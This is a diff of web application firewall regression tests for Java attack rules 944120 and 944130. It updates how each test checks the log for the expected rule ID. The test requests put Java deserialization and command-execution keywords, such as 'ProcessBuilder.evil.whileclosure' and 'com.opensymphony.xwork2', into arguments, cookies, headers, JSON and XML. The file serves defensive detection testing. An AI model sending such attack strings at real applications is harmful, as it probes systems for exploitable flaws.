@@ -2161,7 +2265,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 106 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2181,7 +2286,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 107 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2201,7 +2307,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 108 desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2220,7 +2327,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 109 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2239,7 +2347,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 110 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2258,7 +2367,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 111 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2277,7 +2387,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeserializationfactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 112 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: 
@@ -2296,7 +2407,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeserializationfactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 113 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2315,7 +2427,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeserializationfactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 114 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2334,7 +2447,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 115 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2353,7 +2467,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 116 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2378,7 +2493,8 @@ tests: {"ProcessBuilder.evil.prototypeserializationfactory": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 117 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2403,7 +2519,8 @@ tests: {"ProcessBuilder.evil.prototypeserializationfactory": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 118 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: 
@@ -2428,7 +2545,8 @@ tests: ProcessBuilder.evil.prototypeserializationfactory -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 119 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2453,7 +2571,8 @@ tests: ProcessBuilder.evil.prototypeserializationfactory -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 120 desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2472,7 +2591,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.whileclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 121 desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2491,7 +2611,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.whileclosure=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 122 desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2511,7 +2632,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 123 desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2531,7 +2653,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 124 desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2551,7 +2674,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 125 desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" stages: 
@@ -2570,7 +2694,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 126 desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2589,7 +2714,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 127 desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2608,7 +2734,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 128 desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2627,7 +2754,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.whileclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 129 desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2646,7 +2774,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.whileclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 130 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2665,7 +2794,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.whileclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 131 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2685,7 +2815,8 @@ tests: data: | {"test": "ProcessBuilder.evil.whileclosure"} output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 132 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: 
@@ -2705,7 +2836,8 @@ tests: data: | {"ProcessBuilder.evil.whileclosure": "test"} output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 133 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2730,7 +2862,8 @@ tests: {"ProcessBuilder.evil.whileclosure": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 134 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2755,7 +2888,8 @@ tests: {"ProcessBuilder.evil.whileclosure": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 135 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2780,7 +2914,8 @@ tests: ProcessBuilder.evil.whileclosure -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 136 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2805,4 +2940,5 @@ tests: ProcessBuilder.evil.whileclosure -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml index 39be47806..9eac2d2ed 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml @@ -22,7 +22,8 @@ tests: version: "HTTP/1.0" data: "test=com.opensymphony.xwork2" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 2 desc: "Argument name includes keyword com.opensymphony.xwork2" stages: 
@@ -41,7 +42,8 @@ tests: version: "HTTP/1.0" data: "com.opensymphony.xwork2=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 3 desc: "Cookie test includes keyword com.opensymphony.xwork2" stages: @@ -61,7 +63,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 4 desc: "Cookie name includes keyword com.opensymphony.xwork2" stages: @@ -81,7 +84,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 5 desc: "Request header test includes keyword com.opensymphony.xwork2" stages: @@ -101,7 +105,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 6 desc: "XML attribute value includes keyword com.opensymphony.xwork2" stages: @@ -120,7 +125,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 7 desc: "XML element value includes keyword com.opensymphony.xwork2" stages: @@ -139,7 +145,8 @@ tests: version: "HTTP/1.0" data: "com.opensymphony.xwork2" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 8 desc: "Nested XML element value includes keyword com.opensymphony.xwork2" stages: @@ -158,7 +165,8 @@ tests: version: "HTTP/1.0" data: "com.opensymphony.xwork2" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 9 desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" stages: @@ -177,7 +185,8 @@ tests: version: "HTTP/1.0" data: "test=com.opensymphony.xwork2" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 10 desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" stages: 
@@ -196,7 +205,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"com.opensymphony.xwork2\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 11 desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" stages: @@ -215,7 +225,8 @@ tests: version: "HTTP/1.0" data: "{\"com.opensymphony.xwork2\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 12 desc: "Argument test includes keyword com.sun.org.apache" stages: @@ -234,7 +245,8 @@ tests: version: "HTTP/1.0" data: "test=com.sun.org.apache" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 13 desc: "Argument name includes keyword com.sun.org.apache" stages: @@ -253,7 +265,8 @@ tests: version: "HTTP/1.0" data: "com.sun.org.apache=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 14 desc: "Cookie test includes keyword com.sun.org.apache" stages: @@ -273,7 +286,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 15 desc: "Cookie name includes keyword com.sun.org.apache" stages: @@ -293,7 +307,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 16 desc: "Request header test includes keyword com.sun.org.apache" stages: @@ -313,7 +328,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 17 desc: "XML attribute value includes keyword com.sun.org.apache" stages: @@ -332,7 +348,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 18 desc: "XML element value includes keyword com.sun.org.apache" stages: 
@@ -351,7 +368,8 @@ tests: version: "HTTP/1.0" data: "com.sun.org.apache" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 19 desc: "Nested XML element value includes keyword com.sun.org.apache" stages: @@ -370,7 +388,8 @@ tests: version: "HTTP/1.0" data: "com.sun.org.apache" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 20 desc: "Content-Type text/plain includes keyword com.sun.org.apache" stages: @@ -389,7 +408,8 @@ tests: version: "HTTP/1.0" data: "test=com.sun.org.apache" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 21 desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" stages: @@ -408,7 +428,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"com.sun.org.apache\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 22 desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" stages: @@ -427,7 +448,8 @@ tests: version: "HTTP/1.0" data: "{\"com.sun.org.apache\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 23 desc: "Argument test includes keyword java.io.BufferedInputStream" stages: @@ -446,7 +468,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.BufferedInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 24 desc: "Argument name includes keyword java.io.BufferedInputStream" stages: @@ -465,7 +488,8 @@ tests: version: "HTTP/1.0" data: "java.io.BufferedInputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 25 desc: "Cookie test includes keyword java.io.BufferedInputStream" stages: @@ -485,7 +509,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 26 desc: "Cookie name includes keyword java.io.BufferedInputStream" stages: 
@@ -505,7 +530,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 27 desc: "Request header test includes keyword java.io.BufferedInputStream" stages: @@ -525,7 +551,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 28 desc: "XML attribute value includes keyword java.io.BufferedInputStream" stages: @@ -544,7 +571,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 29 desc: "XML element value includes keyword java.io.BufferedInputStream" stages: @@ -563,7 +591,8 @@ tests: version: "HTTP/1.0" data: "java.io.BufferedInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 30 desc: "Nested XML element value includes keyword java.io.BufferedInputStream" stages: @@ -582,7 +611,8 @@ tests: version: "HTTP/1.0" data: "java.io.BufferedInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 31 desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" stages: @@ -601,7 +631,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.BufferedInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 32 desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" stages: @@ -620,7 +651,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.BufferedInputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 33 desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" stages: 
@@ -639,7 +671,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.BufferedInputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 34 desc: "Argument test includes keyword java.io.BufferedReader" stages: @@ -658,7 +691,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.BufferedReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 35 desc: "Argument name includes keyword java.io.BufferedReader" stages: @@ -677,7 +711,8 @@ tests: version: "HTTP/1.0" data: "java.io.BufferedReader=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 36 desc: "Cookie test includes keyword java.io.BufferedReader" stages: @@ -697,7 +732,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 37 desc: "Cookie name includes keyword java.io.BufferedReader" stages: @@ -717,7 +753,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 38 desc: "Request header test includes keyword java.io.BufferedReader" stages: @@ -737,7 +774,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 39 desc: "XML attribute value includes keyword java.io.BufferedReader" stages: @@ -756,7 +794,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 40 desc: "XML element value includes keyword java.io.BufferedReader" stages: @@ -775,7 +814,8 @@ tests: version: "HTTP/1.0" data: "java.io.BufferedReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 41 desc: "Nested XML element value includes keyword java.io.BufferedReader" stages: 
@@ -794,7 +834,8 @@ tests: version: "HTTP/1.0" data: "java.io.BufferedReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 42 desc: "Content-Type text/plain includes keyword java.io.BufferedReader" stages: @@ -813,7 +854,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.BufferedReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 43 desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" stages: @@ -832,7 +874,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.BufferedReader\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 44 desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" stages: @@ -851,7 +894,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.BufferedReader\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 45 desc: "Argument test includes keyword java.io.ByteArrayInputStream" stages: @@ -870,7 +914,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.ByteArrayInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 46 desc: "Argument name includes keyword java.io.ByteArrayInputStream" stages: @@ -889,7 +934,8 @@ tests: version: "HTTP/1.0" data: "java.io.ByteArrayInputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 47 desc: "Cookie test includes keyword java.io.ByteArrayInputStream" stages: @@ -909,7 +955,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 48 desc: "Cookie name includes keyword java.io.ByteArrayInputStream" stages: @@ -929,7 +976,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 49 desc: "Request header test includes keyword java.io.ByteArrayInputStream" stages: 
@@ -949,7 +997,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 50 desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" stages: @@ -968,7 +1017,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 51 desc: "XML element value includes keyword java.io.ByteArrayInputStream" stages: @@ -987,7 +1037,8 @@ tests: version: "HTTP/1.0" data: "java.io.ByteArrayInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 52 desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" stages: @@ -1006,7 +1057,8 @@ tests: version: "HTTP/1.0" data: "java.io.ByteArrayInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 53 desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" stages: @@ -1025,7 +1077,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.ByteArrayInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 54 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" stages: @@ -1044,7 +1097,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.ByteArrayInputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 55 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" stages: @@ -1063,7 +1117,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.ByteArrayInputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 56 desc: "Argument test includes keyword java.io.ByteArrayOutputStream" stages: 
@@ -1082,7 +1137,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.ByteArrayOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 57 desc: "Argument name includes keyword java.io.ByteArrayOutputStream" stages: @@ -1101,7 +1157,8 @@ tests: version: "HTTP/1.0" data: "java.io.ByteArrayOutputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 58 desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" stages: @@ -1121,7 +1178,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 59 desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" stages: @@ -1141,7 +1199,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 60 desc: "Request header test includes keyword java.io.ByteArrayOutputStream" stages: @@ -1161,7 +1220,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 61 desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" stages: @@ -1180,7 +1240,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 62 desc: "XML element value includes keyword java.io.ByteArrayOutputStream" stages: @@ -1199,7 +1260,8 @@ tests: version: "HTTP/1.0" data: "java.io.ByteArrayOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 63 desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" stages: @@ -1218,7 +1280,8 @@ tests: version: "HTTP/1.0" data: "java.io.ByteArrayOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 64 desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" stages: 
@@ -1237,7 +1300,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.ByteArrayOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 65 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" stages: @@ -1256,7 +1320,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 66 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" stages: @@ -1275,7 +1340,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 67 desc: "Argument test includes keyword java.io.CharArrayReader" stages: @@ -1294,7 +1360,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.CharArrayReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 68 desc: "Argument name includes keyword java.io.CharArrayReader" stages: @@ -1313,7 +1380,8 @@ tests: version: "HTTP/1.0" data: "java.io.CharArrayReader=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 69 desc: "Cookie test includes keyword java.io.CharArrayReader" stages: @@ -1333,7 +1401,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 70 desc: "Cookie name includes keyword java.io.CharArrayReader" stages: @@ -1353,7 +1422,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 71 desc: "Request header test includes keyword java.io.CharArrayReader" stages: @@ -1373,7 +1443,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 72 desc: "XML attribute value includes keyword java.io.CharArrayReader" stages: 
@@ -1392,7 +1463,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 73 desc: "XML element value includes keyword java.io.CharArrayReader" stages: @@ -1411,7 +1483,8 @@ tests: version: "HTTP/1.0" data: "java.io.CharArrayReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 74 desc: "Nested XML element value includes keyword java.io.CharArrayReader" stages: @@ -1430,7 +1503,8 @@ tests: version: "HTTP/1.0" data: "java.io.CharArrayReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 75 desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" stages: @@ -1449,7 +1523,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.CharArrayReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 76 desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" stages: @@ -1468,7 +1543,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.CharArrayReader\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 77 desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" stages: @@ -1487,7 +1563,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.CharArrayReader\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 78 desc: "Argument test includes keyword java.io.DataInputStream" stages: @@ -1506,7 +1583,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.DataInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 79 desc: "Argument name includes keyword java.io.DataInputStream" stages: @@ -1525,7 +1603,8 @@ tests: version: "HTTP/1.0" data: "java.io.DataInputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 80 desc: "Cookie test includes keyword java.io.DataInputStream" stages: 
@@ -1545,7 +1624,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 81 desc: "Cookie name includes keyword java.io.DataInputStream" stages: @@ -1565,7 +1645,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 82 desc: "Request header test includes keyword java.io.DataInputStream" stages: @@ -1585,7 +1666,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 83 desc: "XML attribute value includes keyword java.io.DataInputStream" stages: @@ -1604,7 +1686,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 84 desc: "XML element value includes keyword java.io.DataInputStream" stages: @@ -1623,7 +1706,8 @@ tests: version: "HTTP/1.0" data: "java.io.DataInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 85 desc: "Nested XML element value includes keyword java.io.DataInputStream" stages: @@ -1642,7 +1726,8 @@ tests: version: "HTTP/1.0" data: "java.io.DataInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 86 desc: "Content-Type text/plain includes keyword java.io.DataInputStream" stages: @@ -1661,7 +1746,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.DataInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 87 desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" stages: @@ -1680,7 +1766,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.DataInputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 88 desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" stages: 
